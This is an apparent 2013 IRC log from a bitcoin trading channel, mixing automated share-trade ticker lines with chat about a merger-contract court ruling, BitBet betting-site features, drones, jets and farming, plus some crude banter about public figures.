[ASICMINER-PT] 10 @ 1.36309998 = 13.631 BTC [-] {6} Sep 24 03:31:57 [BTCTC] [ASICMINER-PT] 30 @ 1.35516666 = 40.655 BTC [-] {3} Sep 24 03:31:57 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1402 = 0.5608 BTC [-] Sep 24 03:33:07 Gerard E. Lynch, southern new york kicks so much ass he will be hereby introduced into bitcoin's public record. he says : Sep 24 03:33:14 The Agreement provides that in the event of termination, no party shall be liable beyond the specific liabilities imposed in the Agreement (i.e., the termination fee), except “that no such termination shall relieve any party … from any liability or damages resulting from the wilful and material breach … by a party of any of its representations, warranties, covenants or agreements set forth in this Agreement.” ( Sep 24 03:33:14 Agreement § 7.02; emphasis added). J&J argues that defendants’ conduct was “wilful.” Whether a factfinder could so find depends on the meaning of that term as it is used in the Agreement. While defendants argue that a breach is only willful if it is committed with malice or in bad faith, plaintiff [J&J] contends that “wilful” merely means “intentional.” Sep 24 03:33:36 In support of their argument that the Agreement preserves liability only for malicious breaches, defendants argue that the word “willful” would be unnecessary unless it meant “malicious.” There is no reason to limit liability to breaches that are intentional, they claim, because any breach of this Agreement would be intentional—”[h]eavily counseled parties to mega-mergers do not breach merger agreements out Sep 24 03:33:36 of inadvertence, negligence, or mistake.” (Guidant/BSC Reply 5.) As a factual matter, this claim is questionable. It could just as well be said that heavily counseled parties to mega-mergers do not sign merger agreements containing glaringly ambiguous terms that lead to avoidable litigation—but here we are. Sep 24 03:33:59 [HAVELOCK] [AM100] 15 @ 0.01509 = 0.2264 BTC [-] Sep 24 03:36:25 too dense text.. causes timeouts :D Sep 24 03:37:02 [BTCTC] [BITVPS] 11532 @ 0.00118848 = 13.7056 BTC [-] {7} Sep 24 03:37:02 [BTCTC] [BASIC-MINING] 10 @ 0.075017 = 0.7502 BTC [+] {2} Sep 24 03:37:02 [MPEX] [S.MPOE] 8646 @ 0.00091112 = 7.8775 BTC [-] {2} Sep 24 03:38:03 [BTCTC] [BITVPS] 4128 @ 0.000025 = 0.1032 BTC [-] Sep 24 03:38:41 "Your Honor, it was not malicious, just intentional" Sep 24 03:40:05 [HAVELOCK] [AM100] 80 @ 0.01432674 = 1.1461 BTC [-] {5} Sep 24 03:40:49 ThickAsThieves, you around? I got a question. Sep 24 03:41:16 n/m, I am dumb... i got it figured out Sep 24 03:42:14 these lawyers... ThickAsThieves, is your intent malicious, neutral, benefactory or completely misguided? Sep 24 03:46:11 [BTCTC] [BTC-BOND] 117 @ 0.009445 = 1.1051 BTC [+] Sep 24 03:49:14 [MPEX] [S.MPOE] 6328 @ 0.00091 = 5.7585 BTC [-] Sep 24 03:49:14 [BTCTC] [BTC-TRADING-PT] 10 @ 0.02001 = 0.2001 BTC [+] Sep 24 03:50:16 jurov lol. Sep 24 03:50:21 o look, tat's not around ? Sep 24 03:50:28 i didn't know that can happen. Sep 24 03:51:16 [BTCTC] [FN] [BTC-GROWTH] 110 @ 0.05590909 = 6.15 BTC [+] {2} Sep 24 03:56:21 [BTCTC] [ASICMINER-PT] 8 @ 1.36325 = 10.906 BTC [+] {2} Sep 24 03:57:22 [BTCTC] [ASICMINER-PT] 1 @ 1.36 BTC [-] Sep 24 04:00:25 [BTCTC] [LABCOIN] 250 @ 0.00130822 = 0.3271 BTC [+] {2} Sep 24 04:02:05 Eventually, McAfee loses his cool. "You know, something went wrong. Fifteen years ago, I had some beautiful software and they took it over. I don't know what they did," he says in the video. "It was like the time I hired that Bangkok prostitute to do my taxes while he f*cked my accountant. It was terrible. The same f*cking thing is going on now." Sep 24 04:02:27 [BTCTC] [ASICMINER-PT] 10 @ 1.3955 = 13.955 BTC [+] {2} Sep 24 04:03:22 lolwhat ?! Sep 24 04:03:28 [BTCTC] [FN] [DMS.SELLING] 375 @ 0.00649998 = 2.4375 BTC [+] {2} Sep 24 04:03:29 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.05651 = 0.5651 BTC [+] Sep 24 04:03:42 mcafee don't ask his lawyers anything, he tells them Sep 24 04:04:29 [BTCTC] [ASICMINER-PT] 2 @ 1.397 = 2.794 BTC [+] Sep 24 04:04:54 link or something ? Sep 24 04:05:07 http://mashable.com/2013/06/19/john-mcafee-uninstalls-software/ Sep 24 04:05:08 John McAfee Shows How to Uninstall McAfee Software in Bizarre NSFW Video Sep 24 04:05:29 [MPEX] [S.MPOE] 7486 @ 0.00091401 = 6.8423 BTC [+] {2} Sep 24 04:05:32 that cat knows how to belize Sep 24 04:08:20 duide for real ?! Sep 24 04:08:29 real as real Sep 24 04:08:32 [BTCTC] [LABCOIN] 115 @ 0.001303 = 0.1498 BTC [-] {2} Sep 24 04:10:18 i didn't know he had such a nice voice. Sep 24 04:10:34 [BTCTC] [LABCOIN] 499 @ 0.0013 = 0.6487 BTC [-] Sep 24 04:10:52 omg bartholomew is in the labcoin lab of coins! Sep 24 04:10:58 i can see the chips hashing pot in the distance! Sep 24 04:14:39 [BTCTC] [LABCOIN] 2731 @ 0.00127953 = 3.4944 BTC [-] {3} Sep 24 04:15:40 [BTCTC] [ASICMINER-PT] 1 @ 1.397 BTC [+] Sep 24 04:15:57 anyway. good that rich people are starting to use the system for what it's actually useful : lolz. Sep 24 04:16:16 :) Sep 24 04:17:42 [MPEX] [S.MPOE] 5074 @ 0.0009245 = 4.6909 BTC [+] {2} Sep 24 04:19:44 [BTCTC] [ASICMINER-PT] 9 @ 1.39833332 = 12.585 BTC [+] {4} Sep 24 04:22:28 mircea_popescu: sadly the things you wanted to be in bitcoin record were censored, check the log and kick kakobrekla Sep 24 04:22:47 [BTCTC] [FN] [DMS.SELLING] 400 @ 0.00650647 = 2.6026 BTC [+] {3} Sep 24 04:22:57 wha? Sep 24 04:22:59 o the horror. Sep 24 04:23:06 well no matter, i shall remedy by my own hand!@ Sep 24 04:23:25 is this a good time to run? Sep 24 04:23:50 bad time to ask Sep 24 04:24:33 its never a bad time to ask Sep 24 04:26:51 [BTCTC] [COGNITIVE] 3 @ 0.15 = 0.45 BTC [+] Sep 24 04:27:36 mircea_popescu: Would bbet consider allowing bets to close more than one week before the "resolution date"? I think if that change were made it might draw out more "long shot" bettors early in the process, that just get overwhelmed by late betters when that long-shot becomes more of the high-probability outcome. (My anecdotal observations, see late betters just bet big and screw the early bettors despite th Sep 24 04:27:37 weighting algo). e.g. - the predicted difficulty level by a certain date bets. BTW - good change in bbet FAQ today. Sep 24 04:28:04 good evening Sep 24 04:28:08 yes i think it does, it can be chosen Sep 24 04:28:14 good night Sep 24 04:28:53 [BTCTC] [ASICMINER-PT] 1 @ 1.396 BTC [-] Sep 24 04:29:23 http://trilema.com/2013/our-emperor-deliver-us/ Sep 24 04:29:24 here we go. Sep 24 04:29:26 Our Emperor, deliver us. pe Trilema - Un blog de Mircea Popescu. Sep 24 04:29:41 bgupta possibly, if it has a zeroconf. Sep 24 04:29:54 [BTCTC] [ASICMINER-PT] 16 @ 1.40699999 = 22.512 BTC [+] {6} Sep 24 04:36:14 so - maybe YABMC finally comes to bitfunder afterall Sep 24 04:36:17 ;) Sep 24 04:36:26 whats a zeroconf? Sep 24 04:37:01 [BTCTC] [FN] [DMS.SELLING] 330 @ 0.00657664 = 2.1703 BTC [+] {5} Sep 24 04:37:22 wager on bet proposition Sep 24 04:38:03 [BTCTC] [COGNITIVE] 12 @ 0.15 = 1.8 BTC [+] Sep 24 04:38:19 ah Sep 24 04:38:45 but does the interface allow to choose such? Sep 24 04:39:06 http://bitbet.us/new/ Sep 24 04:39:10 New BitBet Sep 24 04:39:12 PLACE YOUR BET ON: Sep 24 04:39:12 NO YES DON'T TAKE A SIDE Sep 24 04:39:39 sorry, not what i meant Sep 24 04:39:40 you just put some btc on a side along with your bet,t hwere's an address there Sep 24 04:39:42 also tat, your rss is on Sep 24 04:39:51 my rss? Sep 24 04:39:54 oh Sep 24 04:39:56 the socket Sep 24 04:39:59 no Sep 24 04:39:59 haha. it shall be known as tat.rss-pt Sep 24 04:40:01 um no Sep 24 04:40:02 i get it Sep 24 04:40:04 [BTCTC] [LABCOIN] 1300 @ 0.00130299 = 1.6939 BTC [-] {2} Sep 24 04:40:05 hehe Sep 24 04:40:10 the resolution rs Sep 24 04:40:12 s Sep 24 04:40:14 :) Sep 24 04:40:17 also the closed/resolved headings are clickable Sep 24 04:40:17 you wanted resolved bets rrs iirc? Sep 24 04:40:22 and lead to the search preset. Sep 24 04:40:26 wow Sep 24 04:40:31 rss* Sep 24 04:40:35 all teh updatez Sep 24 04:40:39 anywayu Sep 24 04:40:43 what i meant was Sep 24 04:40:55 bgupta asked about ending bets more than a week before resolution Sep 24 04:41:01 yeah. Sep 24 04:41:05 [BTCTC] [ASICMINER-PT] 10 @ 1.4235 = 14.235 BTC [+] {2} Sep 24 04:41:06 i asked if interface allows that Sep 24 04:41:23 it stops at 7 Sep 24 04:41:30 2 to 7 iirc. Sep 24 04:41:34 i do enjoy your writing mp Sep 24 04:41:34 what you thought it goes over 11? Sep 24 04:41:48 well thats what bgupta asked Sep 24 04:41:49 but on a serious note Sep 24 04:41:55 we didnt think more is needed at the time Sep 24 04:41:58 he wants custom bet close dare Sep 24 04:42:01 date* Sep 24 04:42:05 far from resolution Sep 24 04:42:06 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.075 = 3.75 BTC [+] Sep 24 04:42:07 right now you could make a bet that resolves on the 29th Sep 24 04:42:12 and bets close 2 days before resolution Sep 24 04:42:13 how far Sep 24 04:42:21 any amount Sep 24 04:42:34 any amount of far Sep 24 04:42:38 for eexample Sep 24 04:42:43 i dun think i am following this Sep 24 04:42:51 and how do you know what he wants in the first place ?! Sep 24 04:42:57 if you wannt bet that BTC/USD will be $500 before June 1 2014, Sep 24 04:42:58 bgupta explain yourself! lol Sep 24 04:43:04 and close it Jan 1 Sep 24 04:43:14 the point being Sep 24 04:43:22 Vexual ty./ Sep 24 04:43:26 the close it gets, the more weighting ruins early betters Sep 24 04:43:33 while people watch price slowly go up Sep 24 04:43:38 they want larger amount of far between closing time and resolution Sep 24 04:43:40 you can set end weight to anything you wish, like 95k Sep 24 04:43:52 correct kako Sep 24 04:44:08 [BTCTC] [COGNITIVE] 2 @ 0.138 = 0.276 BTC [-] Sep 24 04:44:13 and how does werighing ruin early bettors ?! Sep 24 04:44:37 well if no more bets are allowed, no more weight is lost Sep 24 04:44:52 we just wait for bet to resolve after a certain point Sep 24 04:44:55 rather than allow more Sep 24 04:44:59 i dont like too much bets stuck in 'closed' limbo , there has to be some limit to it, but i can see raising it Sep 24 04:45:09 [BTCTC] [FN] [BTC-GROWTH] 256 @ 0.07794921 = 19.955 BTC [+] {3} Sep 24 04:45:21 mircea_popescu: well for example, any bet that resolves end of this year, betting can currently only close on xmas day. (or if the net resolves early.) e.g. XYZ will happen in 2013. If the probability of outcome changes drastically between the start of betting and the closing of betting, those that bet early on the low probility event kinda get screwed by people piling on one it looks more like a sure thing, Sep 24 04:45:22 despite the weighting. Sep 24 04:45:27 ThickAsThieves i don't understand that at all. Sep 24 04:46:03 I'd say the compromise would be a minimum betting window. Sep 24 04:46:08 bgupta let's be abstract here. the risk over time functional is probably not a polynomial, but something more c omplex, perhaps even discrete. the weight is linear. obviously these won't match Sep 24 04:46:10 [BTCTC] [ASICMINER-PT] 6 @ 1.39016666 = 8.341 BTC [-] {2} Sep 24 04:46:11 say a month or so. Sep 24 04:46:17 as in, the real risk over time will dip under or over Sep 24 04:46:41 originally i had in the draft for this thing an ability for the bettor to introduce an arbitrary weigh curve, and the site to interpret that functional. Sep 24 04:47:16 i think it's overthinking it, and kako's comprmise might cover it Sep 24 04:47:22 the problems were that this is not straightforward to do (as good notation is something maybe half the math grads understand, and wysiwyg notation of curves we don't have yet on computers, in spite of 50 years of efforts started at parc) Sep 24 04:47:27 just allow like 60 days or somesuch Sep 24 04:47:38 you'll end up with one longass dropdown Sep 24 04:48:12 [BTCTC] [ASICMINER-PT] 1 @ 1.39 BTC [-] Sep 24 04:48:16 splines in photoshop are pretty good Sep 24 04:48:26 (most vector programs, iirc) Sep 24 04:48:33 can you type that in cli style ? Sep 24 04:48:52 or have bitbet come with matlab client lol Sep 24 04:49:03 solidworks lets you put in radii and coefficients Sep 24 04:49:08 jcpham: hm, what do you want to foundation to do? :P Sep 24 04:49:57 while youre being so receptive, might i suggest bet escrow Sep 24 04:50:20 two guys talk shit, wanna make a bet? yeah let's make one on bitbet! Sep 24 04:50:26 Yeah you'd have the issue of a bunch of unresolved bets, but I think that could be dealt with on the UX side. (Custom weighting could help, but it doesn't solve the issue, it just means late bettors would have to bet even more, which could work I guess, but makes the math required, more conplex for users.) Sep 24 04:50:30 on the grounds that there exists something more credible than me holding it, except we've not yet discovered it./ Sep 24 04:50:37 how do you propose to escrow ? mtgox ? Sep 24 04:50:38 Anyone know the best way to reach burnside? I have a google auth reset on my account (says it takes 30 days) so I cant move any of my shares around =( Sep 24 04:50:53 bottom of a bottle Sep 24 04:50:59 Doctor_Andonuts i'd be surprised if you can reach him atm. Sep 24 04:51:11 ThickAsThieves or you meant private bets ? Sep 24 04:51:23 man to man Sep 24 04:51:33 whether public can see is optional Sep 24 04:51:34 we have some drafts of that being worked on. Sep 24 04:51:41 cool Sep 24 04:51:44 Yeah, thats what I am afraid of. I might have to wait the 30 days I guess? Sep 24 04:51:48 it's a little more complex upon consideration than it seems, but i think something might come of it. Sep 24 04:52:16 [BTCTC] [ASICMINER-PT] 29 @ 1.38996551 = 40.309 BTC [-] {2} Sep 24 04:52:16 Doctor_Andonuts https://bitcointalk.org/index.php?topic=126885.0 you could always post there... Sep 24 04:52:24 just have a wallet that waits for two predefined deposits, if one isnt filled, it gets refunded Sep 24 04:52:36 resolution is the hard part Sep 24 04:52:37 :) Sep 24 04:53:02 I'll add a +1 on the bet escrow idea, but I really want the feature to have bets close to new bets further out than 7 days before the resolution date. (Consider it a feature request, that I would use if implemented.) Sep 24 04:53:11 more problems than that. suppose A wants to bet B that he has sex with C. Sep 24 04:53:20 Dang, the Activemining transfer time limit ends in a week and I can't get on my account because of google auth problems Sep 24 04:53:39 bgupta oh i finally get what you mean. it's further IN than 7 days (ie, closer to the current date than the 7 days allow) Sep 24 04:53:48 YES Sep 24 04:53:51 o i see. Sep 24 04:54:11 kakobrekla do you suppose that dropdown could be replaced with a type-in field prepopulated with a default ? Sep 24 04:54:18 [BTCTC] [ASICMINER-PT] 1 @ 1.375 BTC [-] Sep 24 04:54:21 and make it go now + 2 days bet close -2 days as limits Sep 24 04:55:08 hm ok Sep 24 04:55:19 of course the big request in the room is, bitbet naming it's own odds and hosting bets Sep 24 04:55:30 its* Sep 24 04:55:51 why would the free market want to have a central planner ? Sep 24 04:55:53 and then tradeable bet shares Sep 24 04:56:03 this isnt the free market Sep 24 04:56:04 o o i see, it's really "pls to give us free liqudity" Sep 24 04:56:20 it's entertainment or a service Sep 24 04:56:20 [HAVELOCK] [CBTC] 9803 @ 0.00039691 = 3.8909 BTC [+] {7} Sep 24 04:56:46 well, maybe the us tradition is to destroy the free market by repackaging it as entertainment or a service. but bitcoin is against that. Sep 24 04:56:46 I want some of that A B C action Sep 24 04:57:09 maybe, but you'd make more money Sep 24 04:57:21 [BTCTC] [ASICMINER-PT] 14 @ 1.39 = 19.46 BTC [+] Sep 24 04:57:27 i don't want to make more "money". i want to make actual money in an environment it's worth living in. Sep 24 04:57:41 one step at a time! Sep 24 04:57:53 im a radical. Sep 24 04:57:59 lol Sep 24 04:58:09 THAT'S the word i was lookin for Sep 24 04:58:22 [BTCTC] [ASICMINER-PT] 17 @ 1.38029411 = 23.465 BTC [-] {2} Sep 24 04:58:25 was trying to find a term for you in a conversation today Sep 24 04:58:40 asshole meanie, just isnt fair Sep 24 04:58:54 vitriolically radical. Sep 24 04:59:00 ooh Sep 24 04:59:10 reactionary isn't half bad, but it's not the whole picture either Sep 24 04:59:24 [HAVELOCK] [AM100] 150 @ 0.01509193 = 2.2638 BTC [+] {4} Sep 24 04:59:43 surely there's a perfect school of philosphy that applies as well Sep 24 04:59:57 life? Sep 24 05:00:12 nah like existentialism or such Sep 24 05:00:47 WAY of life, not just life Sep 24 05:01:01 that's called buddhism :) Sep 24 05:01:25 [BTCTC] [ACTIVEMINING] 320 @ 0.00166944 = 0.5342 BTC [+] {3} Sep 24 05:01:53 how does marx read with bitcoin in mind? Sep 24 05:02:55 Vexual poorly. Sep 24 05:03:36 :) i havent attempted it Sep 24 05:03:47 maybe one day we'll have popescuism Sep 24 05:04:21 sounds awful doesn't it. Sep 24 05:04:39 besides, there's no sartreism either. Sep 24 05:04:42 i can live with it Sep 24 05:04:57 it's a realistic view of the world rooted in lots of study and experiencing the transition from communism with an intact brain Sep 24 05:05:29 [BTCTC] [LABCOIN] 150 @ 0.00130166 = 0.1952 BTC [+] {2} Sep 24 05:05:31 314 btct.co related emails so far today... Sep 24 05:05:56 i tend to agree. people especially sheltered/bored english speakers managed to miss out on a lot of otherwise illuminating and instructive experience./ Sep 24 05:06:10 ThickAsThieves "you are ill equipped to interact straight..." Sep 24 05:06:37 to be fair, i got some mail on the topic too. a few people wanting to know if i hitch seat rates again. Sep 24 05:07:07 mine were asked for Sep 24 05:07:13 to be fair Sep 24 05:07:21 a Sep 24 05:07:32 [BTCTC] [CRYPTO-TRADE] 3 @ 0.141 = 0.423 BTC [+] Sep 24 05:07:36 BTCOxygen leo is looking for you Sep 24 05:07:44 yer in trouuuuuuuble Sep 24 05:07:59 https://pbs.twimg.com/media/BU40U9wCAAEuMvE.jpg:large Sep 24 05:08:07 i remember the days hillary was kinda pretty. Sep 24 05:08:14 i guess im fucking old. Sep 24 05:08:18 lol Sep 24 05:08:29 hillary had monica 1st Sep 24 05:08:32 the daughter was on jon stewart Sep 24 05:08:39 Chelsea Sep 24 05:08:39 hill dawg Sep 24 05:08:45 she's tough to look at Sep 24 05:08:48 nice hair though... Sep 24 05:09:00 http://coochiecrunch.files.wordpress.com/2013/01/hillary_clinton_young.jpg Sep 24 05:09:16 wow Sep 24 05:09:24 hilary was def cuter than clesea Sep 24 05:09:27 she's got that golden retriever look in her eye Sep 24 05:09:28 chelsea* Sep 24 05:09:31 makes great women. Sep 24 05:09:33 [BTCTC] [LABCOIN] 300 @ 0.00125819 = 0.3775 BTC [-] {3} Sep 24 05:09:41 a golden retriever that REALLY wants the ball Sep 24 05:10:06 yeah Sep 24 05:10:21 has knc shipped yet or what? Sep 24 05:10:23 love dem gogetters Sep 24 05:10:24 https://bitcointalk.org/index.php?topic=300430.msg3220655#msg3220655 Sep 24 05:10:33 Are Bitcoin securities Legal? Sep 24 05:10:45 no Sep 24 05:10:48 amazing question. Sep 24 05:10:49 AMAZING COMPANY! Sep 24 05:10:56 Michelle filing for divorce again? Sep 24 05:11:02 mircea_popescu: This is an extreme example, and not the bet I want to propose but one example of such a bet would be: "btc/usd will trade above 1000 USD on XYZ exchange before the end of 2014" and have that bet close for betting Jan 1st 2014. Currently betting yes on that might be considered a bit of a long shot. But if btc came close to trading near 1000 USD any time before Dec 24th 2014, folks would pile o Sep 24 05:11:03 YES, and then the early bettors would have their winning majorly diluted. Sep 24 05:11:15 Another example would be structuring a sports bet that closes for betting at the beginning of a season, but resolves at the end of a season. I think enabling these kinds of bets would bring in more betters, at the cost of holding onto their btc for a long time, and dealing with a potentially large book of unresolved bets. Sep 24 05:11:57 interesting Sep 24 05:12:00 the only issue i see Sep 24 05:12:02 the sports example makes plenty of sense. Sep 24 05:12:05 is that bet volume is low Sep 24 05:12:14 the other one has even odds to work eiother way. i say this from experience : Sep 24 05:12:22 so you wait months to get your .2 btc back Sep 24 05:12:26 people pile on whether it is advantageous or disadvantageous to them Sep 24 05:12:47 ThickAsThieves here's the thing : even longshot bets provide better interest than what you can get on reasonable loans Sep 24 05:12:50 and for much less risk. Sep 24 05:13:03 i suppose Sep 24 05:13:07 people just need to get used to the fact that this game has a longer timeline than a few months. Sep 24 05:13:31 hard to feel that way with new drama every 2 weeks Sep 24 05:13:41 my online bookie rounds up winnings on 1c bets Sep 24 05:13:58 well.. i'm patient apparently. Sep 24 05:13:59 but i get it Sep 24 05:14:03 you wanna be the rock Sep 24 05:14:04 the btc crowd is shortsighted? me shocked Sep 24 05:14:08 1.5 becomes 2 and they pay out 87% on average Sep 24 05:14:11 still, a 20% locked in interest over 100 btc for a year is a great deal. Sep 24 05:14:20 if you can trust the issuer. Sep 24 05:14:21 Yes Sep 24 05:14:34 on the other hand, 7% a week is a bad deal. Sep 24 05:14:38 [BTCTC] [DMS.MINING] 8000 @ 0.00130505 = 10.4404 BTC [-] {6} Sep 24 05:14:44 even if you do make 7% a few weeks. Sep 24 05:14:44 Who has 7%/wk? Sep 24 05:14:48 heh Sep 24 05:14:51 the20year1 old history. Sep 24 05:17:21 http://bitbet.us/new/ <- almost arbitrary betting ending time setting possible nao Sep 24 05:17:24 New BitBet Sep 24 05:18:05 do the "new bets" show up on "old bitbet"? Sep 24 05:18:30 bgupta uh ?! Sep 24 05:19:06 ah sorry Sep 24 05:24:48 [BTCTC] [LABCOIN] 7000 @ 0.00125564 = 8.7895 BTC [-] {9} Sep 24 05:27:20 fighter jets buzzing hard here Sep 24 05:29:11 where is here? Sep 24 05:29:14 kenya? Sep 24 05:29:21 australia Sep 24 05:29:30 Maybe chinese trawlers? Sep 24 05:29:35 superhornet, its the iphone 5 of warfare Sep 24 05:29:43 i didn't know jets grew in australia Sep 24 05:29:44 At least for countries that have money Sep 24 05:29:46 is it some kind of spider ? Sep 24 05:29:59 it's a relatively decent aircraft Sep 24 05:30:21 you don't mean the light aircraft do you ? :D Sep 24 05:30:29 we import jets Sep 24 05:30:33 It's a all-purpose aircraft Sep 24 05:30:34 no theyre prettyy much the business Sep 24 05:30:46 Austraila doesn't have any domestic military jets that I'm aware of Sep 24 05:30:47 we bought about 20 from the yanks Sep 24 05:30:59 esier to buy than develop Sep 24 05:31:03 there was this ultralight kit you could buy Sep 24 05:31:20 Aircraft development is getting more and more bloated Sep 24 05:31:23 Look at the F35 :( Sep 24 05:31:29 are yo mechanically minded mp? Sep 24 05:31:39 what's that mean ? Sep 24 05:31:44 i would hope im organically minded. Sep 24 05:31:49 could you build a plane? Sep 24 05:31:56 yes Sep 24 05:31:56 in principle. Sep 24 05:32:07 well... a kit wtf. its made to be easy. Sep 24 05:32:13 aircarft are pretty cool Sep 24 05:33:49 ive hard a low altitue superhornet on the edge of sound Sep 24 05:33:51 but a jet? Sep 24 05:33:53 i want a jety. Sep 24 05:33:57 *heard Sep 24 05:33:57 [BTCTC] [LABCOIN] 5866 @ 0.00130165 = 7.6355 BTC [+] {4} Sep 24 05:34:00 jet* Sep 24 05:34:09 i don't want a jet so much as to fly one briefly Sep 24 05:34:09 those thongs dont even need guns Sep 24 05:34:39 anyways jets are doomed Sep 24 05:34:49 arent we all Sep 24 05:34:49 clog the intakes with disposable smart rockets Sep 24 05:35:08 how are they doomed? Sep 24 05:35:09 slash mini jets Sep 24 05:35:16 cost horrendous amounts of money Sep 24 05:35:20 so ? Sep 24 05:35:27 And have lower maintenence than props Sep 24 05:35:30 a prop plane is fast enough Sep 24 05:35:36 sorry, jets in current form Sep 24 05:35:38 and more expensive in the long run for larger haulers Sep 24 05:35:44 huge thing carrying a human Sep 24 05:35:49 unless you want to scare the shit out of people Sep 24 05:35:50 well everything in its current form is doomed Sep 24 05:35:50 moronic idea Sep 24 05:35:57 huge thing carying international cargo that needs to be there quickly Sep 24 05:36:15 in the context of air space control, i believe the context was the20year3 Sep 24 05:36:29 anyway, yes drones will take over ww2 style fighter jetsd Sep 24 05:36:55 for the same reason nobody played invaders while physically located in the little ship Sep 24 05:36:55 Military? Possibly, but the problem with drones is that if there's a GPS or general satellite failure the entire fleet is screwed Sep 24 05:36:58 and make neat inroads on urban territory control too Sep 24 05:37:09 nah we just don't have good local mapping yet Sep 24 05:37:14 With decent resources (nation state) you could wipe out the entire US drone fleet in the course of 4-5 hours at a cost of $250m or less Sep 24 05:37:19 the20year3 a drone doesn't HAVE to fly gps. Sep 24 05:37:43 Sure, they can use INS, but it's not nearly as good as GPS, and almost everything now is GPS guided Sep 24 05:37:48 *sigh* Sep 24 05:37:51 not what i meant. Sep 24 05:37:51 no vision. Sep 24 05:38:03 SLAM my friend the20year3 Sep 24 05:38:04 eventually memory will get small enough you can have a mn sq miles of detailed map in the thing Sep 24 05:38:10 it just pilots like humans do. Sep 24 05:38:11 The US is pulling most of our LGBs out of service and replacing them with Jdams which become pretty poor weapons after GPS failure Sep 24 05:38:19 simultaneous location and mapping Sep 24 05:38:29 What drone is capable of firing a slam? Sep 24 05:38:35 derp a slam Sep 24 05:38:44 slam is a navigation technique Sep 24 05:38:49 involving mapping Sep 24 05:38:51 and locating Sep 24 05:38:53 simultanously Sep 24 05:39:08 i thought you were talking about the AGM84E :D Sep 24 05:39:29 anyways Sep 24 05:39:37 there's lots of room for improvement there Sep 24 05:39:50 involving multiple sensing nodes and a distributed mapping whatever Sep 24 05:39:55 Sure, granted the system the US has in place now is pretty awesome...........But the problem is , it's still easy to knock out the US data systems Sep 24 05:40:13 Heck the terrain mapping systems we had in the 70s were amazing too Sep 24 05:40:13 AMAZING COMPANY! Sep 24 05:40:35 an old cessan and a genious mechanic is the best way to get into aircraft, get the one with the back seat Sep 24 05:40:38 But, my biggest worry is that we're building a managot line in the sky with drones & GPS Sep 24 05:40:59 lol the harpoon thing ? that's like half a ton Sep 24 05:41:16 the20year3 maginot. Sep 24 05:41:25 oops Sep 24 05:41:38 an aircraft mechanic is like a tatoo artist, if you're gonna go there, do it right Sep 24 05:41:57 bunkers are somewhat immovable yes Sep 24 05:42:08 and the us military actually lacks the vision to build tomorrow's armed force Sep 24 05:42:22 i think i would be an excellent armsmith Sep 24 05:42:42 maybe when things deteriorate properly here i'll move down to ars and build out mp's robo-stockade Sep 24 05:42:57 well that'd definitely be a fun thing Sep 24 05:43:03 now that btctc's dead i can't ipo a robo defense platform after all :( Sep 24 05:43:07 ars? Sep 24 05:43:07 the desktop pewpewpewer Sep 24 05:43:15 yeah man Sep 24 05:43:18 any day Sep 24 05:43:23 not going to romania Sep 24 05:43:31 It's extremely difficult to produce quality arms in the US , unless you grease pockets the right way you can't develop Sep 24 05:43:39 I'm not sure what ars means Sep 24 05:43:42 would build that for the room and board Sep 24 05:44:43 well you'd probably need very finely machined parts Sep 24 05:44:51 chicks dig planes Sep 24 05:45:00 but i'd definitely ipo a corp that i judged had a serious shot at making it Sep 24 05:45:56 i think i'd go for cheap parts actually Sep 24 05:46:15 are you talking about making uns? Sep 24 05:46:18 and selectively buy the right ones Sep 24 05:46:23 http://www.dailymail.co.uk/news/article-526655/Introducing-worlds-smallest-gun-fires-deadly-300mph-bullets--just-TWO-inches-long.html Sep 24 05:46:23 not guns specifically Sep 24 05:46:27 Introducing the world's smallest gun that fires deadly 300mph bullets - but is just TWO inches long Sep 24 05:46:29 small bore guns have been made Sep 24 05:46:44 yup :) Sep 24 05:46:48 Vexual http://trilema.com/2013/since-you-boys-are-printing-tanks-now/ Sep 24 05:46:48 3d printing is a thing Sep 24 05:47:12 300mph? lol Sep 24 05:47:13 lol what a giant hand Sep 24 05:47:56 make food, you'll make more money and feel better about it Sep 24 05:48:04 300mph is barely enough to break your skin Sep 24 05:48:36 fuck making more food Sep 24 05:48:40 more food is the problem with this planet Sep 24 05:48:48 well the needle doenst have to go 300 to break your skin Sep 24 05:48:49 too many goddamn people thriving on too many cheap calories Sep 24 05:48:54 good food Sep 24 05:48:59 hm Sep 24 05:49:01 There isn't a food problem in the world, there's a corrupt government destroying agriculture problem though Sep 24 05:49:03 doesn't scale well Sep 24 05:49:12 [BTCTC] [DMS.MINING] 1061 @ 0.0013 = 1.3793 BTC [-] Sep 24 05:49:13 dont need to scale Sep 24 05:49:29 for your requirements Sep 24 05:49:32 i have someone who does that Sep 24 05:49:48 the20year3 http://trilema.com/2013/the-corn-thing/ Sep 24 05:50:13 [BTCTC] [DMS.MINING] 5336 @ 0.00129997 = 6.9366 BTC [-] {3} Sep 24 05:50:14 [BTCTC] [ASICMINER-PT] 3 @ 3.2 = 9.6 BTC [+] {2} Sep 24 05:50:32 <[\\\]> 3.2 for asicminer? Sep 24 05:50:39 yep hit it Sep 24 05:50:40 <[\\\]> wasnt it just at 1.3 or something? Sep 24 05:51:05 [\\\] it varies. Sep 24 05:51:11 <[\\\]> obviously Sep 24 05:51:15 [BTCTC] [ASICMINER-PT] 1 @ 1.39 BTC [-] Sep 24 05:51:15 snooze you loose Sep 24 05:51:15 [BTCTC] [FN] [DMS.SELLING] 177 @ 0.00654519 = 1.1585 BTC [-] {2} Sep 24 05:51:15 [BTCTC] [BASIC-MINING] 25 @ 0.081332 = 2.0333 BTC [+] {4} Sep 24 05:51:16 option exercise perhaps? Sep 24 05:51:59 Meh Sep 24 05:52:19 Is the author of that article suggesting we replace agricultural products with synthetic foodstuffs? Sep 24 05:53:38 the author is pointing out that the replacement is hardly optional. Sep 24 05:54:34 there will always be a market for quality Sep 24 05:54:42 Correct Sep 24 05:55:15 this is true, in the sense there's currently a market for child sex slaves. Sep 24 05:55:18 vitro meat looks interesting Sep 24 05:55:19 [MPEX] [S.MPOE] 6750 @ 0.00092894 = 6.2703 BTC [+] Sep 24 05:56:00 But, so does some of the new ultra productive crop variations Sep 24 05:56:20 im not excluding large scale agriculture Sep 24 05:57:01 best practice is currently relatively simple Sep 24 05:57:12 this wont stay the same Sep 24 05:57:21 [BTCTC] [ASICMINER-PT] 4 @ 1.39 = 5.56 BTC [-] Sep 24 05:57:25 by the time chem inc is done with it, large scale agriculture stands with agriculture roughly in the relation diocletian's republic stood with the republic. Sep 24 05:57:32 sort of like furniture improved by termites. Sep 24 05:57:49 We'll see Sep 24 